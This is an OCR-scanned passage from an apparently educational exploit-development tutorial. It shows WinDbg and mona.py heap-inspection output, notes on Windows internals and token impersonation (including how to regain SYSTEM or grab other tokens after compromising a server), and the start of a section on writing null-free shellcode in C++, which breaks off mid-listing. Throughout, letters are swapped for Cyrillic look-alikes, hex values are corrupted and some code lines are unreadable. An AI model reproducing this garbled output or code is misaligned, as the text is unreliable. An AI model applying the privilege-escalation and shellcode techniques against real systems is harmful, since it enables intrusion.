+0х200 SystemDefaultActivationContextData : 0х00050000 ACTIVATION CONTEXT DATA 
+0x204 SystemAssemblyStorageMap : (null) 

+0x208 MinimumStackCommit : 0 

+0х20с НаСа аск : 0x002d5cb8 FLS САЦВАСК INFO 
*0x210 FlsListHead : LIST ENTRY [ 0x2d5a98 - 0x2d5a98 ] 
*0x218 FIsBitmap : Ox77eb4240 Void 

*0x21c FlsBitmapBits  : [4] Ox1f 

*0x22c FlsHighlndex  :4 

*0x230 WerRegistrationData : (null) 

+0x234 WerShipAssertPtr : (null) 
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+0х238 рСотехР ага : 0x00070000 Мола 
+0x23c plmageHeaderHash : (null) 


%0х240 TracingFlags :0 

+0х240 НеартТгастаЕпабјеа : Oyo 

+0x240 CritSecTracingEnabled : 0у0 

+0х240 SpareTracingBits : 0у000000000000000000000000000000 (0) 





The interesting part is this: 


+0х088 МитбегО#еарѕ :7 


+0х090 РгосеззНеарз : 0x77eb4760 -> 0х00240000 Void 





ProcessHeaps points to an array of pointers to HEAP structures (one pointer per heap). 
Let's see the array: 

0:001» dd 0x77eb4760 

77eb4760 00290000 00560000 01630000 01190000 
77е64770 02160000 02650000 02860000 00000000 
77е64780 00000000 00000000 00000000 00000000 
77eb4790 00000000 00000000 00000000 00000000 
77eb47a0 00000000 00000000 00000000 00000000 
77eb47b0 00000000 00000000 00000000 00000000 
77е647с0 00000000 00000000 00000000 00000000 
77eb47d0 00000000 00000000 00000000 00000000 





We can display the НЕАР structure of the first heap like this: 


0:001» dt HEAP 290000 

ntdll! HEAP 

+0x000 Entry : HEAP ENTRY 
*0x008 SegmentSignature : Oxffeeffee 


+0x00c ЗедтетНадз :0 

*0x010 SegmentListEntry : LIST ENTRY [ 0x2d00a8 - 0x2d00a8 ] 
*0x018 Heap : 0x002d0000 HEAP 

+0х01с ВаѕеАаагеѕѕ — : 0x002d0000 Void 
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+0х020 NumberOfPages : 0x100 

*0x024 FirstEntry : 0x002d0588 _HEAP_ENTRY 
+0x028 LastValidEntry : 0x003d0000 НЕАР ЕМТКҮ 
+0x02c NumberOfUnCommittedPages : Охао 
+0x030 NumberOfUnCommittedRanges : 1 

+0x034 SegmentAllocatorBackTracelndex : 0 
+0x036 Reserved :0 

+0х038 UCRSegmentList : LIST ENTRY [ Ox2ffffO - Ox2ffffO | 
+0x040 Flags : 0x40000062 

+0x044 ForceFlags : 0x40000060 

+0x048 CompatibilityFlags : 0 

+0х04с EncodeFlagMask : 0х100000 

+0х050 Encoding : HEAP ENTRY 

+0x058 PointerKey : Ox7d37bf2e 

+0х05с Interceptor  : 0 

+0х060 VirtualMemoryThreshold : Oxfe00 

+0x064 Signature : Oxeeffeeff 

+0х068 Зедтеп{Кезегие :0х100000 

+0хОбс Зедтеп{Соттй : 0х2000 

+0х070 DeCommitFreeBlockThreshold : 0x200 
+0х074 DeCommitTotalFreeThreshold : 0х2000 
*0x078 TotalFreeSize : 0х1601 

+0x07c MaximumAllocationSize : 0x7ffdefff 

+0x080 ProcessHeapsListIndex : 1 

+0x082 HeaderValidateLength : 0x138 

+0x084 HeaderValidateCopy : (null) 

+0x088 NextAvailableTagIndex : 0 


+0x08a МахититТадтаех : 0 


+0x08c TagEntries : (null) 

+0x090 UCRList : LIST. ENTRY | Ox2fffe8 - Ox2fffe8 | 
+0х098 AlignRound : 0x17 

+0x09c AlignMask : Oxfffffff8 
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+0x0a0 VirtualAllocdBlocks : LIST ENTRY [ 0x2d00a0 - Ox2d00a0 ] 
%0х0а8 SegmentList : LIST ENTRY | 0x2d0010 - 0x2d0010 | 
+0x0b0 АПосаю!ВасКТгасе!паех : 0 

+0x0b4 NonDedicatedListLength : 0 

+0x0b8 BlocksIndex : 0x002d0150 Void 

+0х0рс UCRIndex : 0х00240590 Мола 


%0х0с0 PseudoTagEntries : (null) 


+0x0c4 FreeLists : LIST ENTRY [ 0x2f0a60 - Ox2f28a0 | 
*0x0cc LockVariable :0х00240138 HEAP LOCK 

+0x0d0 CommitRoutine : Ox7d37bf2e long *7d37bf2e 
+0x0d4 FrontEndHeap _ : (null) 

+0х0а8 FrontHeapLockCount : 0 

+0x0da FrontEndHeapType : 0" 

*0x0dc Counters : НЕАР COUNTERS 

*0x130 TuningParameters : HEAP TUNING PARAMETERS 





We can get useful information by using mona.py. Let's start with some general information: 


0:003» !py mona heap 

Hold on... 

[+] Command used: 

Іру mona.py һеар 

Peb : 0x7efde000, NtGlobalFlag : 0х00000070 


0x005a0000 (1 segment(s 
0x00170000 (2 segment(s 


: 0х005а0000) * Default process heap Encoding key: 0х171#4їс1 
: 0x00170000,0x045a0000) Encoding key: 0x21f9a301 
: 0x00330000) Encoding key: 0x1913b812 


( (5) 
( (5) 
0x00330000 (1 segment(s) 
0х00190000 (2 зедтеп(5) : 0х00190000,0х00ба0000) Encoding key: 0х547202аа 
( (5) 
( ) 
( ) 


0x020c0000 (1 segment(s 
0x02c50000 (1 segment(s 
0х02610000 (2 зедтеп 5 


: 0х020с0000) Encoding key: 0х0896#86а 
: 0х02с50000) Епсодта key: 0х21#9а301 
: 0х02610000,0х04450000) Епсоата key: 0х757121се 
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Please specify a valid searchtype -t 


Valid values are : 
lal 
Ifh 
all 
segments 
chunks 
layout 
fea 


bea 


[+] This топа.ру action took 0:00:00.012000 





As we can see there are 7 heaps and mona also shows the segments for each heap. 


We can also use !heap: 


0:003» !heap -m 

Index Address Мате Debugging options enabled 

1: 005a0000 

Segment at 005a0000 to 006a0000 (0005f000 bytes committed) 
2: 00170000 

Segment at 00170000 to 00180000 (00010000 bytes committed) 
Segment at 045а0000 to 04б6а0000 (00005000 bytes committed) 
3: 00330000 

Segment at 00330000 to 00370000 (00006000 bytes committed) 
4: 00140000 

Segment at 00190000 to 001е0000 (00006000 bytes committed) 
Segment at 00ба0000 to 007а0000 (0002е000 bytes committed) 
5: 020c0000 

Segment at 02020000 to 02100000 (00001000 bytes committed) 
6: 02c50000 

Segment at 02с50000 to 02с90000 (00025000 bytes committed) 
7: 02b10000 


232: 
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Segment at 02610000 to 02620000 (0000е000 bytes committed) 


Segment at 04450000 to 04550000 (00033000 bytes committed) 





The option "-m" shows also the segments. 


То see the segments for a specific heap (0х5а0000), we can use: 


0:003> !py mona heap -h 5а0000 -t segments 
Ноја оп... 

[+] Command used: 

Ipy топа.ру heap -h 5а0000 -t segments 

Peb : Ох7етдеооо, NtGlobalFlag : 0х00000070 


0х005а0000 (1 segment(s) : 0х005а0000) * Default process heap Encoding key: 0x171f4fc1 
0х00170000 (2 segment(s) : 0х00170000,0х045а0000) Encoding key: 0х21#9а301 
0х00330000 (1 зедтепц5) : 0х00330000) Encoding key: 0х19136812 
0х00140000 (2 5едтеп{(5): 0х00140000,0х006а0000) Encoding key: 0х547202аа 
0х020с0000 (1 segment(s) : 0х020с0000) Encoding key: 0x0896f86d 
0х02с50000 (1 ѕедтепі(ѕ) : 0х02с50000) Encoding key: 0х21#9а301 

( ) 


0х02610000 (2 segment(s) : 0х02610000,0х04450000) Encoding key: 0х757121се 

[+] Processing heap 0x005a0000 

Segment List for heap 0x005a0000: 

Segment 0х005а0588 - Ох006ба0000 (FirstEntry: 0х005а0588 - LastValidEntry: 0х006а0000): 0x000ffa78 bytes 


[+] This топа.ру action took 0:00:00.014000 





Note that mona shows a summary of all the heaps followed by the specific information we asked. We can 
also omit “-h 580000" to get a list of the segments of all the heaps: 


0:003» !py mona heap -t segments 


Hold оп... 
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[+] Command used: 


Іру mona.py heap -t segments 
Peb : Ох7етдеооо, NtGlobalFlag : 0х00000070 


0x005a0000 (1 зедтеп 5 
0x00170000 (2 segment(s 
0х00330000 (1 зедтеп 5 
0х020с0000 (1 зедтеп (5 
0x02c50000 (1 зедтеп (5 
0х02610000 (2 зедтеп 5 


( 
( 
( 
( 
( 
( 


( ) 
( ) 
( ) 
0x001d0000 (2 segmeni(s) : 
( ) 
( ) 
( ) 


: 0х005а0000) * Default process heap Encoding key: 0х171#4їс1 
: 0x00170000,0x045a0000) Encoding key: 0x21f9a301 
: 0x00330000) Encoding key: 0x1913b812 


0х00190000,0х00ба0000) Епсоата key: 0х547202аа 


: 0х020с0000) Епсодта key: 0х0896#86а 
: Ох02с50000) Епсодта key: 0х21#9а301 
: 0х02610000,0х04450000) Encoding key: 0х757121се 


[+] Processing heap 0x005a0000 
Segment List for heap 0x005a0000: 


Segment 0х005а0588 - 0х006а0000 (FirstEntry: 0х005а0588 - LastValidEntry: 0х006а0000): 0х000На78 bytes 


[+] Processing heap 0x00170000 
Segment List Тог heap 0х00170000: 


Segment 0х00170588 - 0х00180000 (FirstEntry: 0х00170588 - LastValidEntry: 0х00180000): 0x0000fa78 bytes 
Segment 0х045а0000 - 0х046а0000 (FirstEntry: 0х045а0040 - LastValidEntry: 0х046а0000): 0х00100000 bytes 


[+] Processing heap 0х00330000 
Segment List Гог heap 0x00330000: 


Segment 0x00330588 - 0x00370000 (FirstEntry: 0x00330588 - LastValidEntry: 0x00370000): 0x0003fa78 bytes 


[+] Processing heap 0x001d0000 
Segment List Тог heap 0х00140000: 


342 
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Segment 0х00140588 - 0х001е0000 (FirstEntry: 0х00190588 - LastValidEntry: 0х001е0000): 0x0000fa78 bytes 
Segment 0х00ба0000 - 0х007а0000 (Ага !Епту: 0х00ба0040 - LastValidEntry: 0х007а0000): 0х00100000 bytes 


[+] Processing heap 0x020c0000 
Segment List Тог heap 0х020с0000: 


Segment 0х020с0588 - 0х02100000 (Ега Епгу: 0х020с0588 - LastValidEntry: 0х02100000): 0x0003fa78 bytes 


[+] Processing heap 0x02c50000 
Segment List Тог heap 0х02с50000: 


Segment 0x02c50588 - 0x02c90000 (FirstEntry: 0x02c50588 - LastValidEntry: 0х02с90000): Ox0003fa78 bytes 


[+] Processing heap 0х02610000 
Segment List Тог heap 0х02610000: 


Segment 0х02610588 - 0х02620000 (FirstEntry: 0х02610588 - LastValidEntry: 0х02620000): 0x0000fa78 bytes 
Segment 0х04450000 - 0х04550000 (Ага !Епту: 0х04450040 - LastValidEntry: 0х04550000): 0х00100000 bytes 


[+] This топа.ру action took 0:00:00.017000 





mona.py calls the allocated block of memory chunks. To see the chunks in the segments for a heap use: 


0:003» !py mona heap -h 5а0000 -t chunks 
Ноја оп... 

[+] Command used: 

Ipy mona.py heap -h 5а0000 -t chunks 

Peb : 0x7efde000, NtGlobalFlag : 0х00000070 


0х005а0000 (1 segment(s) : 0х005а0000) * Default process heap Encoding key: 0x171f4fc1 
0х00170000 (2 зедтеп( $) : 0х00170000,0х045а0000) Encoding key: 0х21#9а301 
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0х00330000 (1 зедтеп 5 
0x001d0000 (2 segment(s 


( 0x00330000) Encoding key: 0x1913b812 
( 
0x020c0000 (1 segment(s 
( 
( 


)3 

) : 0x001d0000,0x006a0000) Encoding key: 0х547202аа 
(s) : 0х020с0000) Encoding key: 0x0896f86d 
0x02c50000 (1 segment(s) : 
0x02b10000 (2 зедтеп5) : 


0x02c50000) Encoding key: 0x21f9a301 
0х02610000,0х04450000) Encoding key: 0х757121се 


[+] Preparing output Не 'heapchunks.txt 
- (Re)setting logfile heapchunks.txt 

[+] Generating module info table, hang on... 
- Processing modules 


- Done. Let's rock 'n roll. 


[+] Processing heap 0x005a0000 
Segment List for heap 0x005a0000: 


Segment 0x005a0588 - 0х006а0000 (FirstEntry: 0x005a0588 - LastValidEntry: 0х006а0000): 0х000На78 bytes 

Nr of chunks : 2237 

_HEAP_ENTRY psize size unused UserPtr UserSize 
005а0588 00000 00250 00001 005а0590 0000024f (591) (Fill pattern,Extra present,Busy) 
005а07498 00250 00030 00018 005а07е0 00000018 (24) (Fill раќегп,Ехіга ргезеп Визу) 
005а0808 00030 00668 0001a 005а0810 00000b9e (2974) (Fill pattern,Extra present,Busy) 
005а13с0 00668 01378 0001c 005a13c8 0000135c (4956) (Fill pattern,Extra ргезет Визу) 
005a2738 01378 00058 0001c 005a2740 0000003c (60) (Fill pattern,Extra ргезет Визу) 
005а2790 00058 00048 00018 005a2798 00000030 (48) (Fill pattern,Extra ргезеп Визу) 
005a27d8 00048 00090 00018 005а27е0 00000078 (120) (Fill pattern,Extra ргезепт Визу) 
005а2868 00090 00090 00018 005а2870 00000078 (120) (Fill pattern,Extra ргезеп Визу) 
005a28f8 00090 00058 0001c 005а2900 0000003c (60) (Fill pattern,Extra ргезет Визу) 
005а2950 00058 00238 00018 005а2958 00000220 (544) (Fill pattern,Extra present,Busy) 
005а2088 00238 00060 0001е 005a2b90 00000042 (66) (Fill pattern,Extra present,Busy) 


<snip> 
005ec530 00038 00048 0001c 005ес538 0000002c (44) (Fill раќегп,Ехіга present,Busy) 
005ес578 00048 12a68 00000 005ec580 00012а68 (76392) (Fill pattern) 
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O05fefe0 12a68 00020 00003 O05fefe8 00000014 (29) (Busy) 
охоо5тена - 0x006a0000 (епа of segment) : Оха1008 (659464) uncommitted bytes 


Heap : 0х005а0000 : VirtualAllocdBlocks : 0 
Nr of chunks : 0 


[+] This топа.ру action took 0:00:02.804000 





You can also use пеар: 


0:003> !ћеар -h 5а0000 

Index Address Name Debugging options enabled 
1: 005а0000 

Segment at 005а0000 to 00ба0000 (00051000 bytes committed) 
Flags: 40000062 

ForceFlags: 40000060 

Granularity: 8 bytes 

Segment Reserve: 00100000 

Segment Commit: 00002000 

DeCommit Воск Тћге5: 00000200 

DeCommit Total Тпгев: 00002000 

Total Free Size: 00002578 

Max. Allocation Size: 7ffdefff 

Lock Variable at: 005a0138 

Next Тад пдех: 0000 

Maximum Тадтаех: 0000 

Tag Entries: 00000000 

РзиедоТад Entries: 00000000 

Virtual Alloc List: 005а00а0 

Uncommitted ranges: 005a0090 

FreeList[ 00 ] at 005a00c4: 005ec580 . 005e4f28 (18 blocks) 


Heap entries for Зедтег100 in Heap 005a0000 
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address: psize . size flags state (requested size) 


005a0000: 00000 


005a0588: 00588 . 
. 00030 [107] - busy (18), tail fill 
. 00668 [107] - busy (b9e 


( 
( 
( 
01378 [107] - busy (135c 
( 
( 
( 
( 


005a07d8: 00250 
005a0808: 00030 


005a13c0: 00668 . 
005a2738: 01378 . 
005a2790: 00058 . 
005a27d8: 00048 . 


005a2868: 00090 
005a28f8: 00090 


<snip> 


005ес530: 00038. 
005ес578: 00048 . 


. 00588 [101] - busy (587) 


00250 [107] - busy (241), tail fill 


e), tail fill 
c), tail fill 
00058 [107] - busy (3c), tail fill 
00048 [107] - busy (30), tail fill 
00090 [107] - busy (78), tail fill 
) 


. 00090 [107] - busy (78), tail fill 
. 00058 [107] - busy (Зс), tail fill 
005а2950: 00058 . 
005a2b88: 00238 . 


00238 [107] - busy (220), tail fill 
00060 [107] - busy (42), tail fill 


00048 [107] - busy (2c), tail fill 
12a68 [104] free fill 


005fefe0: 12a68 . 00020 [111] - busy (1d) 


O05ff000: 


To display some statistics, add the option “-stat*: 


000a1000 


- uncommitted bytes. 





0:003» !py mona heap -h 5а0000 -t chunks -stat 


Hold on... 


[+] Command used: 


Іру mona.py heap -ћ 5а0000 -t chunks -stat 
Peb : Ok7efde000, NtGlobalFlag : 0х00000070 


0x005a0000 (1 segment(s 
0x00170000 (2 segment(s 


0x001d0000 (2 segment(s 


( 
( 
0x00330000 (1 segment(s 
( 
0x020c0000 (1 segment(s 


E 


: 0х005а0000) * 


( 
( 
( 
( 








) Default process heap Encoding key: 0x171f4fc1 
) : 0x00170000,0x045a0000) Encoding key: 0x21f9a301 

) : 0x00330000) Encoding key: 0x1913b812 

) : 0x001d0000,0x006a0000) Encoding key: 0х547202аа 

): 0х020с0000) Encoding key: 0x0896f86d 
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0х02с50000 (1 segment(s) : 0х02с50000) Епсодта key: 0х21#9а301 
0х02610000 (2 segment(s) : 0х02610000,0х04450000) Encoding key: 0х757121се 


[+] Preparing output file 'heapchunks.txt 
- (Re)setting logfile heapchunks.txt 

[+] Generating module info table, hang on... 
- Processing modules 


- Done. Let's rock 'n roll. 


[+] Processing heap 0x005a0000 
Segment List for heap 0x005a0000: 


Segment 0x005a0588 - 0x006a0000 (FirstEntry: 0x005a0588 - LastValidEntry: 0х006а0000): Ox000ffa78 bytes 
Nr of chunks : 2237 
_HEAP_ENTRY psize size unused UserPtr UserSize 
Segment Statistics: 
Size : 0x12a68 (76392) : 1 chunks (0.04 %) 
Size : 0x3980 (14720) : 1 chunks (0.04 %) 
Size : 0x135c (4956) : 1 chunks (0.04 %) 
Size : 0х11#8 (4600) : 1 chunks (0.04 Yo) 
Size : Охбде (2974) : 1 chunks (0.04 Yo) 
Size : 0xa28 (2600) : 1 chunks (0.04 Yo) 


<snip> 

Size : 0x6 (6) : 1 chunks (0.04 %) 
Size : 0х4 (4) : 15 chunks (0.67 96) 
Size : Ox1 (1) : 1 chunks (0.04 96) 
Total chunks : 2237 


Heap : 0х005а0000 : VirtualAllocdBlocks : 0 
Nr of chunks : 0 


Global statistics 
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Size : 0x12a68 (76392) : 1 chunks (0.04 %) 
Size : 0x3980 (14720) : 1 chunks (0.04 %) 
Size : 0x135c (4956) : 1 chunks (0.04 %) 
Size : 0х1118 (4600) : 1 chunks (0.04 %) 
Size : Oxb9e (2974) : 1 chunks (0.04 %) 
Size : 0xa28 (2600) : 1 chunks (0.04 %) 


<snip> 

Size : 0x6 (6) : 1 chunks (0.04 %) 
Size : 0х4 (4) : 15 chunks (0.67 96) 
Size : Ox1 (1) : 1 chunks (0.04 96) 
Total chunks : 2237 


[+] This топа.ру action took 0:00:02.415000 





mona.py is able to discover strings, BSTRINGs and vtable objects in the blocks/chunks of the segments. To 
see this information, use “-t layout". This function writes the data to the file heaplayout.txt. 
You can use the following additional options: 


• -v: write the data also in the log window 

• -fast: skip the discovery of object sizes 

• -size «sz»: skip strings that are smaller than <sz> 

• -after «val»: ignore entries inside a chunk until either a string or vtable reference is found that 


contains the value «val»; then, output everything for the current chunk. 


Example: 


0:003> !py mona heap -ћ 5a0000 -t layout -v 
Hold on... 

[+] Command used: 

Іру mona.py heap -ћ 5а0000 -t layout -v 

Peb : Ok7efde000, NtGlobalFlag : 0х00000070 


0х005а0000 (1 segment(s) : 0х005а0000) * Default process heap Encoding key: 0x171f4fc1 
0х00170000 (2 segment(s) : 0х00170000,0х045а0000) Encoding key: 0х21#9а301 
0х00330000 (1 ѕедтепі(ѕ) : 0х00330000) Епсодта key: 0х19136812 
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0х00190000 (2 зедтеп(5) : 0х00190000,0х00ба0000) Encoding key: 0х547202аа 


( (5): 
0х020с0000 (1 ѕедтепі(ѕ) : 0х020с0000) Encoding key: 0x0896f86d 
0x02c50000 (1 segment(s) : 
0x02b10000 (2 segment(s) : 


0х02с50000) Encoding key: 0х21#9а301 
0x02b10000,0x04450000) Encoding key: 0x757121ce 


[+] Preparing output Не 'heaplayout.txt 
- (Re)setting logfile heaplayout.txt 

[+] Generating module info table, hang on... 
- Processing modules 


- Done. Let's rock 'n roll. 


[+] Processing heap 0x005a0000 


Chunk 0x005a0588 (Usersize 0x24f, ChunkSize 0x250) : Fill pattern,Extra present,Busy 


Chunk 0x005a07d8 (Usersize 0x18, ChunkSize 0x30) : Fill pattern,Extra present,Busy 
Chunk 0x005a0808 (Usersize Oxb9e, ChunkSize Oxbb8) : Fill pattern,Extra present,Busy 


+03a3 @ 005a0bab->005a0d73 : Unicode (0x1c6/454 bytes, 0xe3/227 chars) : Path=C:\Program Files (x86)\Windows Kits 
18. 1iDebuggers x86 Wwinextarcade;C Program Files (х86УММІР... 


*00ec @ 005a0e5f->005a0eef : Unicode (0x8e/142 bytes, 0x47/71 chars) : PROCESSOR IDENTIFIER-Intel64 Family 6 
Model 60 Stepping 3, Genuinelntel 


+0160 @ 005a104f->005a10d1 : Unicode (0x80/128 bytes, 0x40/64 chars) : PSModulePath=C:\Windows\system32\Windo 
wsPowerShellW1.0WodulesY 


+0234 @ 005a1305->005a1387 : Unicode (0x80/128 bytes, 0x40/64 chars) : WINDBG_DIR=C:\Program Files (x86)\Windo 
ws Kits\8.1\Debuggers\x86 


Chunk 0x005a13c0 (Usersize 0x135c, ChunkSize 0x1378) : Fill pattern,Extra present,Busy 


+04а7 @ О05а1867->005а1ар5 : Unicode (0х24с/588 bytes, 0х126/294 chars) : C:WWindows\System32;;C:\Windows\syste 
m32;C:\Windows\system;C:\Windows;.;C:\Program Files (x86)\Windo... 


+046c @ 005a1f21->005a20e9 : Unicode (0х1с6/454 bytes, Oxe3/227 chars) : Path=C:\Program Files (x86)\Windows Kits 
\8.1\рериддегѕ\хёб\міпехћагсаде;С:\Ргодгат Files (x86)\NVID... 


*00ec @ 005a21d5->005a2265 : Unicode (0x8e/142 bytes, 0x47/71 chars) : PROCESSOR IDENTIFIERz7Intel64 Family 6 
Model 60 Stepping 3, Genuinelntel 


+0160 @ 005а23с5->005а2447 : Unicode (0х80/128 bytes, 0х40/64 chars) : PSModulePath=C:\Windows\system32\Windo 
wsPowerShell\v1.0\Modules\ 


+0234 @ 005а267Ь->005а261а : Unicode (0х80/128 bytes, 0х40/64 chars) : WINDBG_DIR=C:\Program Files (x86)\Windo 
ws Kits\8.1\Debuggers\x86 
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Chunk 0x005a2738 (Usersize Ox3c, ChunkSize 0x58) : Fill pattern,Extra present,Busy 


Chunk 0x005a2790 (Usersize 0x30, ChunkSize 0x48) : Fill pattern,Extra present,Busy 
<snip> 

Chunk 0x005ec4b0 (Usersize 0x30, ChunkSize 0x48) : Fill pattern,Extra present,Busy 
Chunk 0x005ec4f8 (Usersize 0x20, ChunkSize 0x38) : Fill pattern,Extra present,Busy 
Chunk 0x005ec530 (Usersize Ox2c, ChunkSize 0x48) : Fill pattern,Extra present,Busy 
Chunk 0x005ec578 (Usersize 0x12a68, ChunkSize 0x12a68) : Fill pattern 

Chunk 0x005fefe0 (Usersize 0x1d, ChunkSize 0x20) : Busy 





Consider the following two lines extracted from the output above: 


Chunk 0x005a0808 (Usersize Oxb9e, ChunkSize Oxbb8) : Fill pattern,Extra present,Busy 


+03a3 @ 005a0bab->005a0d73 : Unicode (0х1с6/454 bytes, 0xe3/227 chars) : Path=C:\Program Files (x86)\Windows Kits 
\8.1\рериддегѕ\хёб\міпехћагсаде;С:\Ргодгат Files (x86)\NVID... 





The second line tells us that: 


1 the entry is at 3a3 bytes from the beginning of the chunk; 
2 the entry goes from 5a0bab to 5a0d73; 

3. the entry is a Unicode string of 454 bytes or 227 chars; 

4 the string is “Path=C:\Program Files (x86)Windows Kits..." (snipped). 
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Windows Basics 


This is a very brief article about some facts that should be common knowledge to Windows developers, but 
that Linux developers might not know. 


Win32 API 


The main АР! of Windows is provided through several DLLs (Dynamic Link Libraries). An application can 
import functions from those DLL and call them. This way, the internal APIs of the Kernel can change from a 
version to the next without compromising the portability of normal user mode applications. 


PE file format 


Executables and DLLs are PE (Portable Executable) files. Each PE includes an import and an export table. 
The import table specifies the functions to import and in which files they are located. The export table 
specifies the exported functions, i.e. the functions that can be imported by other PE files. 


PE files are composed of various sections (for code, data, etc...). The .reloc section contains information to 
relocate the executable or DLL in memory. While some addresses in code are relative (like for the relative 
jmps), many are absolute and depends on where the module is loaded in memory. 


The Windows loader searches for DLLs starting with the current working directory, so it is possible to 
distribute an application with a DLL different from the one in the system root (\windows\system32). This 
versioning issue is called DLL-hell by some people. 


One important concept is that of a RVA (Relative Virtual Address). PE files use RVAs to specify the position 
of elements relative the base address of the module. In other words, if a module is loaded at an address B 
and an element has an RVA X, then the element’s absolute address in memory is simply B+. 


Threading 


If you’re used to Windows, there’s nothing strange about the concept of threads, but if you come form Linux, 
keep in mind that Windows gives CPU-time slices to threads rather than to processes like Linux. Moreover, 
there is no fork() function. You can create new processes with CreateProcess() and new threads with 
CreateThreads(). Threads execute within the address space of the process they belong to, so they share 
memory. 


Threads also have limited support for non-shared memory through a mechanism called TLS (Thread Local 
Storage). Basically, the TEB of each thread contains a main TLS array of 64 DWORDS and an optional TLS 
array of maximum 1024 DWORDS which is allocated when the main TLS array runs out of available 
DWORDS. First, an index, corresponding to a position in one of the two arrays, must be allocated or 
reserved with T!sAlloc(), which returns the index allocated. Then, each thread can access the DWORD in 
one of its own two TLS arrays at the index allocated. The DWORD can be read with TisGetValue(index) and 
written to with TlsSetValue(index, newValue). 

As an example, TisGetValue(7) reads the DWORD at index 7 from the main TLS array in the TEB of the 
current thread. 


Note that we could emulate this mechanism by using Зе Ситеп ћгеад1а(), but it wouldn't be as efficient. 
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Tokens and Impersonation 


Tokens are representations of access rights. Tokens are implemented as 32-bit integers, much like file 
handles. Each process maintains an internal structure which contains information about ће access rights 
associated with the tokens. 


There are two types of tokens: primary tokens and secondary tokens. Whenever a process is created, it is 
assigned a primary token. Each thread of that process can have the token of the process or a secondary 
token obtained from another process or the LoginUser() function which returns a new token if called with 
correct credentials. 


To attach a token to the current thread you can use SetThreadToken(newToken) and remove it with 
RevertToSelf() which makes the thread revert to primary token. 


Let’s say a user connects to a server in Windows and send username and password. The server, running as 
SYSTEM, will call LogonUser() with the provided credentials and if they are correct a new token is returned. 
Then the server creates a new thread and that thread calls SetThreadToken(new token) where new token 
is the token previously returned by LogonUser(). This way, the thread executes with the same privileges of 
the user. When the thread is finished serving the client, either it is destroyed, or it calls revertToSelf() and is 
added to the pool of free threads. 

If you can take control of a server, you can revert to SYSTEM by calling RevertToSelf() or look for other 
tokens in memory and attach them to the current thread with SetThreadToken(). 


One thing to keep in mind is that CreateProcess() use the primary token as the token for the new process. 
This is a problem when the thread which calls CreateProcess() has a secondary token with more privileges 
than the primary token. In this case, the new process will have less privileges than the thread which created 
it. 

The solution is to create a new primary token from the secondary token of the current thread by using 


DuplicateTokenEx(), and then to create the new process by calling CreateProcessAsUser() with the new 
primary token. 
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Shellcode 


Introduction 

A shellcode is a piece of code which is sent as payload by an exploit, is injected in the vulnerable application 
and is executed. A shellcode must be position independent, i.e. it must work no matter its position in 
memory and shouldn't contain пи! bytes, because {Пе shellcode is usually copied Бу functions like strcpy() 
which stop copying when they encounter a null byte. If a shellcode should contain a null byte, those 
functions would copy that shellcode only up to the first null byte and thus the shellcode would be incomplete. 


Shellcode is usually written directly in assembly, but this doesn't need to be the case. In this section, we'll 
develop shellcode in C/C++ using Visual Studio 2013. The benefits are evident: 


18 shorter development times 
2. intellisense 
3, ease of debugging 


We will use VS 2013 to produce an executable file with our shellcode and then we will extract and fix (i.e. 
remove the null bytes) the shellcode with a Python script. 


C/C++ code 


Use only stack variables 


To write position independent code in C/C++ we must only use variables allocated on the stack. This means 
that we can't write 


C++ 





1 char *v = new char[100]; 


because that array would be allocated on the heap. More important, this would try to call the new operator 
function from msvcr120.dll using an absolute address: 


00191000 6A 64 push 64h 


00191002 FF 15 90 20 19 00 call dword ріг 4$:[1920901] 





The location 192090h contains the address of the function. 


If we want to call a function imported from a library, we must do so directly, without relying on import tables 
and the Windows loader. 


Another problem is that the new operator probably requires some kind of initialization performed by the 
runtime component of {Пе С/С++ language. We don't want to include all that in our shellcode. 


We can't use global variables either: 


http://expdev-kiuhnm.rhcloud.com 





-45- 





EXPLOIT DEVELOPMENT COMMUNITY 


С++ 
int x; 


int main() { 


x = 12; 
) 





The assignment above (if not optimized out), produces 


008E1C7E C7 05 30 91 8E 00 OC 00 00 00 mov dword ptr ds:[8E9130h],0Ch 


where 8E9130h is the absolute address of the variable x. 
Strings pose a problem. If we write 
С++ 


char str[] = "I'm a string"; 





printf(str); 


the string will be put into the section .rdata of the executable and will be referenced with an absolute address. 
You must not use printf in your shellcode: this is just an example to see how str is referenced. Here's the 
asm code: 


00A71006 8D 45 FO lea eax, [str] 
00A71009 56 push esi 

00A7100A 57 push edi 

00А7100В ВЕ 00 21 A7 00 mov еѕі,0А72100һ 
00A71010 8D 70 FO lea edi, [str] 
00A71013 50 push eax 


00А71014 А5 movs dword ptr es:[edi],dword ptr [esi] 
00A71015 А5 movs [e] Пеј (e ptr es:[edi],dword ptr [esi] 
00A71016 A5 movs dword ptr es:[edi],dword ptr [esi] 
00A71017 A4 movs byte ptr es:[edi],byte ptr [esi] 
00A71018 FF 15 90 20 А7 00 са! dword ptr ds:[0A72090h] 





As you can see, the string, located at the address A72100h in the .rdata section, is copied onto the stack (str 
points to the stack) through movsd and movsb. Note that A72100h is an absolute address. This code is 
definitely not position independent. 


If we write 
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C++ 


char *str = "I'm a string"; 


printf(str); 





the string is still put into the .rdata section, but it's not copied onto the stack: 


00A31000 68 00 21 A3 00 push 0A32100h 
00A31005 FF 15 90 20 A300 call dword ptr ds:[0A32090h] 





The absolute position of the string in .rdata is A32100h. 
How can we makes this code position independent? 
The simpler (partial) solution is rather cumbersome: 


C++ 


char str[] = { Ч пи еш ht A Қ 2 ise te НЕЙ T ТТІ, 'g', "0! E 
printf(str); 





Here's the asm code: 


012bE1006 8D 45 FO lea eax, [str] 

012E1009 C7 45 FO 49 27 6D 20 mov dword ptr [str], 206D2749h 
012E1010 50 push eax 

012E1011 C7 45 F4 61 20 73 74 mov dword ptr [ebp-0Ch],74732061h 
012E1018 C7 45 F8 72 69 6E 67 mov dword ptr [ebp-8],676E6972h 
012E101F C6 45 FC 00 mov byte ptr [ebp-4],0 

012E1023 FF 15 90 20 2Е 01 call dword ptr ds:[12E2090h] 





Except for the call to printf, this code is position independent because portions of the string are coded 
directly in the source operands of the mov instructions. Once the string has been built on the stack, it can be 
used. 


Unfortunately, when the string is longer, this method doesn't work anymore. In fact, the code 
С++ 


' 157 12 Үү ЈЕ imp 19). "0! fe 





produces 


013Е1006 66 ОР бЕ 05 00 21 ЗЕ 01 томада хтт0,хттууога ріг ds:[13E2100h] 
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013E100E 8D 45 E8 lea eax,[str] 

013E1011 50 push eax 

013E1012 F3 OF 7F 45 Е8 movdqu xmmword ptr [str],xmm0O 
013E1017 C7 45 F8 73 74 72 69 mov dword ptr [ebp-8],69727473h 


